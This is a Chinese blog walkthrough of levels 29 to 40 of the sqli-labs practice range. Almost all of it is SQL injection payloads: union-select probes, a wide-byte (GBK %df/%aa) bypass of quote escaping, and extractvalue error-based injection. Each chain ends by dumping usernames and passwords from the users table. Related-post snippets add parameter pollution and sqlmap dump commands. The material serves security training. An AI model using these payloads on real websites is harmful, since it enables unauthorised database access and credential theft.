sqli.labs靶场(29到40关)

最新推荐文章于 2024-04-18 10:18:58 发布
最新推荐文章于 2024-04-18 10:18:58 发布
阅读量1.1k 收藏 15
点赞数 22
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lyy8910599download/article/details/136009350
版权
文章详细描述了一系列关于SQL注入攻击的技术挑战,涉及不同关卡中利用unionselect、宽字节字符、报错注入等技巧绕过数据库过滤,获取敏感信息的过程。
摘要由CSDN通过智能技术生成

29、第二十九关

id=1'

id=1''

尝试发现是单引号闭合,

-1' union select 1,2,3--+

-1' union select 1,2,database()--+

-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+

-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')--+

-1' union select 1,2,(select group_concat(username,'~',password) from security.users)--+

30、第三十关

id=1"

id=1""

探测位置:-1" union select 1,2,3--+

POC:-1" union select 1,2,database()--+

POC:-1" union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+

POC:-1" union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')--+

POC:id=-1" union select 1,2,(select group_concat(username,'~',password) from security.users)--+

31、第三十一关

id=1"

id=1""

-1") union select 1,2,3--+

-1") union select 1,2,database()--+

-1") union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+

-1") union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')--+

-1") union select 1,2,(select group_concat(username,'~',password) from security.users)--+

32、第三十二关

id=1'

这关是单引号闭合,但是单引号被转译成\’了,想办法去掉单引号,可用宽字节注入

MySQL 在使用 GBK 编码的时候,会认为两个字符为一个汉字,例如 %aa%5c 就是一个 汉字。因为过滤方法主要就是在敏感字符前面添加 反斜杠 \,所以这里想办法干掉反斜杠即可。

%df 吃掉
具体的原因是 urlencode(') = %5c%27,我们在 %5c%27 前面添加 %df,形 成 %df%5c%27,MySQL 在 GBK 编码方式的时候会将两个字节当做一个汉字,这个时候就把 %df%5c 当做是一个汉字,%27 则作为一个单独的符号在外面,同时也就达到了我们的目的。

-1%aa%5c%27%20union select 1,2,3 --+

-1%aa%5c%27%20union select 1,2,database() --+

-1%aa%5c%27%20union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+

-1%aa%5c%27%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=(select%20right(group_concat(table_name),5)%20from%20information_schema.columns%20where%20table_schema=database()))--+

-1%aa%5c%27%20union%20select%201,2,group_concat(username,0,password)%20from%20users--+

33、第三十三关

这关也是单引号闭合,但是引号被转译了和32关一样,用宽字节

-1%aa%5c%27 union select 1,2,3--+

-1%aa%5c%27 union select 1,2,database()--+

-1%aa%5c%27 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+

-1%aa%5c%27 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=(select right(group_concat(table_name),5) from information_schema.tables where table_schema=database()))--+

-1%aa%5c%27 union select 1,2,(select group_concat(username,0,password) from security.users)--+

34、第三十四关

这关也是引号被转译,试一下宽字节注入,发现有报错信息,可以用报错注入

uname=admin%aa%5c%27%20and extractvalue(1,concat(0x7e,database(),0x7e))--+

admin%aa%5c%27%20and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))--+

admin%aa%5c%27%20and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=(select right(group_concat(table_name),5) from information_schema.tables where table_schema=database())),0x7e))--+

admin%aa%5c%27%20and extractvalue(1,concat(0x7e,(select group_concat(username,0,password) from security.users)))--+

35、第三十五关

-1 union select 1,2,3--+

-1 union select 1,2,database()--+

-1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+

-1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=(select right(group_concat(table_name),5) from information_schema.tables where table_schema=database()))--+

-1 union select 1,2,(select group_concat(username,0,password) from security.users)--+

36、第三十六关

-1%aa%5c%27 union select 1,2,3--+

-1%aa%5c%27 union select 1,2,database()--+

-1%aa%5c%27 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+

-1%aa%5c%27 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=(select right(group_concat(table_name),5) from information_schema.tables where table_schema=database()))--+

-1%aa%5c%27 union select 1,2,(select group_concat(username,0,password) from security.users)--+

37、第三十七关

admin%aa%5c%27and+extractvalue(1,concat(0x7e,database()))--+

admin%aa%5c%27and+extractvalue(1,concat(0x7e,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database())))--+

admin%aa%5c%27and+extractvalue(1,concat(0x7e,(select+group_concat(column_name)+from+information_schema.columns where table_schema=database() and+table_name=(select+right(group_concat(table_name),5) from information_schema.tables where table_schema=database()))))--+

admin%aa%5c%27and+extractvalue(1,concat(0x7e,(select+group_concat(username,0,password)+from+security.users)))--+

38、第三十八关

单引号闭合-1' union select 1,2,3--+

-1' union select 1,2,database()--+

-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+

-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users') --+

-1' union select 1,2,(select group_concat(username,'~',password) from security.users) --+

39、第三十九关

-1 union select 1,2,3--+

-1 union select 1,2,database()--+

-1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security') --+

-1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users') --+

-1 union select 1,2,(select group_concat(username,'~',password) from security.users)--+

40、第四十关

-1') union select 1,2,3--+单引号加括号闭合

-1') union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database())--+

-1') union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users') --+

-1') union select 1,2,(select group_concat(username,'~',password) from security.users)--+

沧海一粟@星火燎原
关注
  • 22
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL-lab 29~37 宽字节注入
qq_52921637的博客
03-22 222
less29是基于 index.php中的单引号字符型的注入 注入语句是:id=-1’ union select 1,2,3 – - 和login.php 基于单引号的参数污染绕过 注入语句是:id=1&id=-1’ union select 1,2,3 – - less30 本与上相似,login.php 基于双引号的参数污染绕过 注入语句是:id=1&id=-1" union select 1,2,3 – - less31 本是,基于 “) 字符型的注入 注入语句是:id=-
sql-labs 29 waf 绕过参数污染
qq_41619455的博客
08-27 1096
waf 绕过学习
SQLi LABS Less-35_sqli-labs第三十五,【深夜思考】
2401_83974639的博客
04-18 338
卡通过 代码WAF 转义了单引号’ , 我们使用 编译 绕过WAF , 先上结果。
SQL-labs的第29——有防火墙 union联合查询攻击(Get)
qq_73393033的博客
08-09 124
我在网上经过查询,这一的防火墙只查询数字性字符,也就是说这一的防火墙只防数字,不防字符串。也就是说毫无作用,完全可以当它不存在。这说明有3个返回点,接下来我们需要确定这三个返回点中有几个回显点。在返回的错误信息中,我们发现\后面是单引号,所以该的闭合方式单引号。我们发现这一与第一没有差别,但是不是说有一个防火墙吗?所以第2和3个返回点是回显位。
sqlilab 29-37 之看不懂的教程
跳房子的博客
01-24 486
第二十九: 呼!前面的超级恶心的再也不想遇见的各种过滤题总算是告一段落,不过个人感觉后面还是会有,不多扯,来看这一题 首先题目提示了一个键词  WAF,哈?这是什么玩意,对于我这个第一次接触的萌新来说,吓得我立刻就去百度-。- 那么接下来就是我经过粗糙理解后的结论: 服务器端是由一个tomcat引擎的jsp服务器和一个apache引擎的php服务器组成的,我们发送的数据会先被jsp服务...
sqli-labs通攻略教程——双服务器+宽字节注入(less29~less37)
m0_55854679的博客
08-11 399
文章目录补充知识-服务器的两层架构less 29less 30less 31less 32less 33less 34less 35less 36less 37 从29开始使用docker搭建的sqli-labs靶场 KALI搭建Docker+Vulhub和sqli-labs靶场 补充知识-服务器的两层架构 mysql之注入天书服务器 服务器两层架构即不同的id值有不同的服务器来解读。 http参数污染:jsp/tomcat使用getgetParameter("id")获取到第一个值,php/apache
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2 3 4 5 4 7 8 9 11 12 13 14 15 16 17 18 19 20 21 22 23 24 的练习内容,可以供给初学sql注入的学者参考
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs靶场
最新发布
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
sqli-labs靶场练习wp的配图.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
sqllabs less--29~31
m0_51607644的博客
01-31 157
首先介绍一下 29,30,31 这三的基本情况: 服务器端有两个部分:第一部分为 tomcat 为引擎的 jsp 型服务器,第二部分为 apache 63 Mysql 注入—sqlilabs—lcamry 为引擎的 php 服务器,真正提供 web 服务的是 php 服务器。工作流程为:client 访问服务器, 能直接访问到 tomcat 服务器,然后 tomcat 服务器再向 apache 服务器请求数据。数据返回 路径则相反。 此处简单介绍一下相环境的搭建。环境为 ubuntu14.04。此处以.
SQL-Labs靶场29-31”教程
钟言的博客
02-27 1万+
本篇为SQL-Labs靶场29-31教程,详细内容包含了:一、二十九 基于错误的WAF单引号注入 1、源码分析 2、HTTP参数污染 3、联合查询注入 4、updatexml报错注入 二、三十 基于错误的WAF双引号注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 三、三十一 基于错误的WAF双引号括 1、源码分析 2、联合查询注入 3、updatexml报错注入等等
sqli-labs (less-35)
kukudeshuo的博客
03-14 202
sqli-labs (less-35) 进入35,输入id=1 http://127.0.0.1/sql1/Less-35/?id=1' 这里单引号被转义了,我们直接查看源代码 这里也使用了GBK编码,但是我们根据错误信息判断这为数字型注入,有没有单引号都无所谓,后面只要注意进行16进制转码就可以了 确定回显位置 http://127.0.0.1/sql1/Less-35/?id=-1 union select 1,2,3--+ 接下来的步骤与less-32一模一样,这里我不具体介绍,具体过
基于Sqli-Labs靶场SQL注入-29~31
Joker
01-07 465
这一篇博客我主要将了HTTP参数污染攻击。同时讲了一下双服务器的工作原理。
sqli-labs进阶篇 29~31
Lucky小小吴的小屋
02-06 615
本文章主要讲述sqli-labs靶场29到32的通心得,从三方面讲述如何通,分别是注入点判断、源码分析、注入过程。文章若有不恰当之处,望指出~~
SQLi LABS Less-29 联合注入
wangyuxiang946的博客
08-16 1万+
salilabs29SQLi-LABS第29使用GET请求提交参数,在url中构造payload即可
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 543
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
sqli-labs/Less-29
m0_71299382的博客
11-20 229
sqli-labs第二十九题
详细sqli-labs(1-65)通讲解
热门推荐
dreamthe的博客
05-17 13万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs靶场15
07-28
SQLMap是一个开源的SQL注入自动化工具,可以帮助你通过SQLi-Labs靶场。使用SQLMap,你需要熟悉基本的命令行语法,并了解SQL注入的基本原理。为了使用SQLMap通过SQLi-Labs靶场,你可以尝试使用以下命令: ``` sqlmap -u <target URL> --dbs ``` 这将列出数据库列表。接下来,你可以使用以下命令枚举数据表: ``` sqlmap -u <target URL> -D <database name> --tables ``` 最后,你可以使用以下命令读取数据表中的数据: ``` sqlmap -u <target URL> -D <database name> -T <table name> --dump ``` 请注意,在实际渗透测试中,使用SQLMap和其他工具需要遵循道德准则和法律规定。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值